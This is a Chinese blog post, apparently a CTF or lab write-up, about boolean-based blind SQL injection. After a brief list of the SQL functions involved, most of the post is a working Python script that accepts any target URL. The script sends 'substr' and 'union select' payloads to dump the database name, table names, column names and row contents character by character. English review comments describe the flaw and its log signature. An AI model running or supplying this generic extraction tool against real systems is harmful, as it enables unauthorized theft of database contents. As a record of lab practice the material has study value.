这是一道布尔注入的题目,其实也可以时间盲注,但是这里介绍一下bool注入。
关于布尔注入,主要使用的就是:
Length()函数 返回字符串的长度
Substr()截取字符串
Ascii()返回字符的ascii码
sleep(n):将程序挂起 n 秒
if(expr1,expr2,expr3):判断语句,如果第一个表达式为真就执行第二个,否则执行第三个
具体的过程这里就不介绍了,因为非常容易上手,就是有点费手,所以最好不要手注。因此可以使用burp suite来进行注入或者sqlmap来直接爆(sqlmap,永远滴神)。但是最好还是学会自己写轮子,每学一种就写轮子,这样慢慢积累,等同于自己写了个sqlmap。
这里我写了个布尔注入的脚本,非常简陋而且并没有用二分法(别问,问就是二分法没学好。。。)。以后会改成二分法来提高效率。
import requests
def database_len(url: str, param1: str, param2: str, cont: str) -> int | None:
    """Probe the length of the current database name, one candidate at a time.

    For each candidate length 1..9 a SQL fragment is appended to
    ``url + param1`` and the page is fetched; the first response whose body
    contains the marker string ``cont`` is taken as the match, which is
    printed and returned.  Returns ``None`` when no candidate in 1..9
    matched.  ``param2`` is accepted for a uniform signature but not used.

    NOTE(review): what this exercises is a server that concatenates a
    request parameter straight into its SQL text; a parameterised query
    removes the flaw.  On the detection side the traffic is a burst of
    near-identical GETs to one endpoint differing only in the trailing
    ``length(database())=N`` term.
    """
    #url='''http://www.sqli.com/Less-8/'''
    for i in range(1,10):
        # Boolean condition appended after the parameter the operator has
        # already closed (see the prompt for param1 at the bottom of the file).
        payload=''' and length(database())=%d -- -'''%i
        r=requests.get(url+param1+payload)
        # `cont` is the operator-supplied marker that appears only on a "true" page.
        if cont in r.text:
            print('database_length:',i)
            return i
def database_name(url: str, param1: str, param2: str, cont: str, db_len: int) -> str:
    """Recover the database name character by character.

    For every position 1..db_len the letters a-z are tried in turn via a
    ``substr(database(),pos,1)='letter'`` condition; the first letter whose
    response body contains ``cont`` is appended and the loop moves on to the
    next position.  A position where no letter matches is silently skipped
    (there is no else branch), so the returned string can be shorter than
    ``db_len``.  ``param2`` is unused here.
    """
    database_name=''
    #url='''http://www.sqli.com/Less-8/'''
    for i in range(1,db_len+1):
        for j in 'abcdefghijklmnopqrstuvwxyz':
            payload=''' and substr(database(),%d,1)='%s' -- -'''%(i,j)
            r=requests.get(url+param1+payload)
            if cont in r.text:
                database_name+=j
                break  # this position is resolved; go to the next one
    print('database_name:',database_name)
    return database_name
def table_number(url: str, param1: str, param2: str, cont: str, db_name: str) -> int:
    """Count the tables in ``db_name`` by stepping a ``limit i,1`` offset.

    Uses ``param2`` (the parameter the prompt describes as non-echoing) with
    a UNION SELECT against ``information_schema.tables``; while the response
    contains ``cont`` another row exists and ``i`` is incremented.  The first
    offset without the marker ends the loop; ``i`` is printed and returned.
    ``param1`` is unused here.

    NOTE(review): ``db_name`` is spliced into the SQL text with ``%s``; here
    it comes from the previous probe (a-z only), not from a user.  For a
    defender, ``information_schema.tables`` queries with a steadily
    increasing ``limit`` offset are a recognisable log/WAF signature.
    """
    #url='''http://www.sqli.com/Less-8/'''
    i=0
    while 1:
        payload=''' union select 1,2,table_name from information_schema.tables where table_schema='%s' limit %d,1 -- -'''%(db_name,i)
        r=requests.get(url+param2+payload)
        if cont in r.text:
            i=i+1
        else:
            break
    print('table_number:',i)
    return i
def table_len(url: str, param1: str, param2: str, cont: str, i: int, db_name: str) -> int | None:
    """Probe the length (1..9) of the ``i``-th table name in ``db_name``.

    Returns the first candidate length whose response contains ``cont``, or
    ``None`` when none of 1..9 matched -- a caller that then evaluates
    ``length+1`` raises ``TypeError``.  ``param2`` is unused here.
    """
    #url='''http://www.sqli.com/Less-8/'''
    for length in range(1,10):
        payload=''' and length((select table_name from information_schema.tables where table_schema='%s' limit %d,1))=%d -- -'''%(db_name,i,length)
        r=requests.get(url+param1+payload)
        if cont in r.text:
            return length
def table_name(url: str, param1: str, param2: str, cont: str, table_number: int, db_name: str) -> list[str]:
    """Recover every table name in ``db_name`` and return them as a list.

    For each table index ``i`` in 0..table_number-1 the name length comes
    from ``table_len``, then positions 0..length (inclusive) are probed with
    the letters a-z through a ``substr(...)`` condition.  Positions where no
    letter matches are skipped, so a name may come back shorter than its
    probed length.  Nothing is printed here; the caller prints the list.
    The local string ``table_name`` shadows this function's own name inside
    the loop, which is harmless because the function is not re-entered.
    ``param2`` is unused.
    """
    #url='''http://www.sqli.com/Less-8/'''
    table_names=[]
    for i in range(0,table_number):
        length=table_len(url,param1,param2,cont,i,db_name)  # None if 1..9 did not match -> TypeError below
        table_name=''
        for j in range(0,length+1):
            for k in 'abcdefghijklmnopqrstuvwxyz':
                payload=''' and substr((select table_name from information_schema.tables where table_schema='%s' limit %d,1),%d,1)='%s' -- -'''%(db_name,i,j,k)
                r=requests.get(url+param1+payload)
                if cont in r.text:
                    table_name+=k
                    break
        table_names.append(table_name)
    return table_names
def column_number(url: str, param1: str, param2: str, cont: str, table_name: str) -> int:
    """Count the columns of ``table_name`` by stepping a ``limit i,1`` offset.

    Same shape as ``table_number``: a UNION SELECT against
    ``information_schema.columns`` is sent through ``param2`` and ``i`` is
    incremented while the response contains ``cont``.  The count is printed
    (Chinese message: "number of columns in table <name>:") and returned.
    ``param1`` is unused here.
    """
    #url='''http://www.sqli.com/Less-8/'''
    i=0
    while 1:
        payload=''' union select 1,2,column_name from information_schema.columns where table_name='%s' limit %d,1 -- -'''%(table_name,i)
        r=requests.get(url+param2+payload)
        if cont in r.text:
            i=i+1
        else:
            break
    print('%s表中列的数量:'%table_name,i)
    return i
def column_len(url: str, param1: str, param2: str, cont: str, j: int, table_name: str) -> int | None:
    """Probe the length (1..24) of the ``j``-th column name of ``table_name``.

    Returns the first candidate length whose response contains ``cont``, or
    ``None`` when none of 1..24 matched.  ``param2`` is unused here.
    """
    #url='''http://www.sqli.com/Less-8/'''
    for length in range(1,25):
        payload=''' and length((select column_name from information_schema.columns where table_name='%s' limit %d,1))=%d -- -'''%(table_name,j,length)
        r=requests.get(url+param1+payload)
        if cont in r.text:
            return length
def column_name(url: str, param1: str, param2: str, cont: str, table_names: list[str]) -> None:
    """Print the column names of every table in ``table_names``.

    For each table the column count comes from ``column_number``; for each
    column index ``j`` the length comes from ``column_len`` and positions
    1..length are probed with the letters a-z.  Results are only printed --
    the ``column_names`` accumulator is commented out -- so the caller gets
    nothing back.  If ``column_len`` returns ``None`` (no match in 1..24),
    ``length+1`` raises ``TypeError``.  ``param2`` is used only indirectly,
    through ``column_number``.
    """
    #url='''http://www.sqli.com/Less-8/'''
    #column_names=[]
    for table_name in table_names:
        column_num=column_number(url,param1,param2,cont,table_name)
        for j in range(0,column_num):
            column_name=''
            length=column_len(url,param1,param2,cont,j,table_name)
            #print('length of column %d of %s: %d'%(table_name,j+1,length))
            for v in range(1,length+1):
                for k in 'abcdefghijklmnopqrstuvwxyz':
                    payload=''' and substr((select column_name from information_schema.columns where table_name='%s' limit %d,1),%d,1)='%s' -- -'''%(table_name,j,v,k)
                    r=requests.get(url+param1+payload)
                    if cont in r.text:
                        column_name+=k
                        break
            # Chinese message: "column <j+1> of <table> is named: <name>"
            print('%s的第%d个列的名字是:%s'%(table_name,j+1,column_name))
        # Blank line after each table's columns (nesting inferred; the source
        # as published carries no indentation).
        print()
def content_number(url: str, param1: str, param2: str, cont: str, table_n: str, column_n: str) -> int:
    """Count the rows of ``table_n`` visible through ``column_n``.

    Same ``limit i,1`` stepping as ``table_number`` / ``column_number``, sent
    through ``param2``; ``i`` grows while the response contains ``cont`` and
    is returned (nothing is printed here).  ``param1`` is unused.

    NOTE(review): ``table_n`` and ``column_n`` come verbatim from ``input()``
    in the main script and are placed into the query text unquoted, so the
    query is whatever the operator typed.
    """
    #url='''http://www.sqli.com/Less-8/'''
    i=0
    while 1:
        payload=''' union select 1,2,%s from %s limit %d,1 -- -'''%(column_n,table_n,i)
        r=requests.get(url+param2+payload)
        if cont in r.text:
            i=i+1
        else:
            break
    return i
def content_len(url: str, param1: str, param2: str, cont: str, table_n: str, column_n: str, i: int) -> int | None:
    """Probe the length (1..24) of row ``i`` of ``column_n`` in ``table_n``.

    Returns the first candidate length whose response contains ``cont``, or
    ``None`` when none of 1..24 matched.  ``param2`` is unused here.
    """
    #url='''http://www.sqli.com/Less-8/'''
    for length in range(1,25):
        payload=''' and length((select %s from %s limit %d,1))=%d -- -'''%(column_n,table_n,i,length)
        r=requests.get(url+param1+payload)
        if cont in r.text:
            return length
def content(url: str, param1: str, param2: str, cont: str, table_n: str, column_n: str) -> None:
    """Print every row value of ``column_n`` in ``table_n``, one per line.

    The row count comes from ``content_number`` and each value's length from
    ``content_len``; positions 1..length are then probed.  Unlike the name
    probes above, the candidate set here is a-z, A-Z and 0-9.  Values are
    printed, not returned.  A ``None`` from ``content_len`` (no match in
    1..24) makes ``length+1`` raise ``TypeError``.  The local string
    ``content`` shadows this function's name inside the loop; harmless, as
    the function is not re-entered.
    """
    #url='''http://www.sqli.com/Less-8/'''
    number=content_number(url,param1,param2,cont,table_n,column_n)
    for i in range(0,number):
        content=''
        length=content_len(url,param1,param2,cont,table_n,column_n,i)
        for j in range(1,length+1):
            for k in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789':
                payload=''' and substr((select %s from %s limit %d,1),%d,1)='%s' -- -'''%(column_n,table_n,i,j,k)
                r=requests.get(url+param1+payload)
                if cont in r.text:
                    content+=k
                    break
        print(content)
# Interactive driver: the four prompts collect the target URL, a parameter
# that echoes results (param1), one that does not (param2), and the marker
# string `cont` that distinguishes a "true" page.  Everything below runs at
# import time; there is no `if __name__ == "__main__"` guard.
url=input("请输入要注入的网址,例如http://www.sqli.com/Less-8/ :")
param1=input("请输入要注入的已经闭合了的参数且可回显的,例如 ?id=1' :")
param2=input("请输入要注入的已经闭合了的参数且不可回显的,例如 ?id=0' :")
cont=input("请输入布尔回显:")
# database_len returns None when no length in 1..9 matched; database_name
# would then fail on `range(1, db_len+1)` with TypeError.
db_len=database_len(url,param1,param2,cont)
print()
db_name=database_name(url,param1,param2,cont,db_len)
print()
# NOTE: this rebinds the module-level name `table_number` from the function
# to its integer result, so the function cannot be called again afterwards.
table_number=table_number(url,param1,param2,cont,db_name)
print()
table_names=table_name(url,param1,param2,cont,table_number,db_name)
print('%s的表如下:'%db_name)  # "tables of <db>:"
for i in table_names:
    print(i)
print()
column_name(url,param1,param2,cont,table_names)
print()
# Read the contents of a chosen column.  The literal sentinel
# 'I want to leave' typed at either prompt exits the loop.
while 1:
    table_n=input('请输入您要读取的表名,如果输入I want to leave,那么程序就会退出:')
    if table_n=='I want to leave' :
        break
    column_n=input('请输入您要读取的列名,如果输入I want to leave,那么程序就会退出:')
    if column_n=='I want to leave':
        break
    print()
    content(url,param1,param2,cont,table_n,column_n)
    print()
因为刚学了相当于2天的python,所以也是写的惨不忍睹。。。(大师傅们轻点喷)。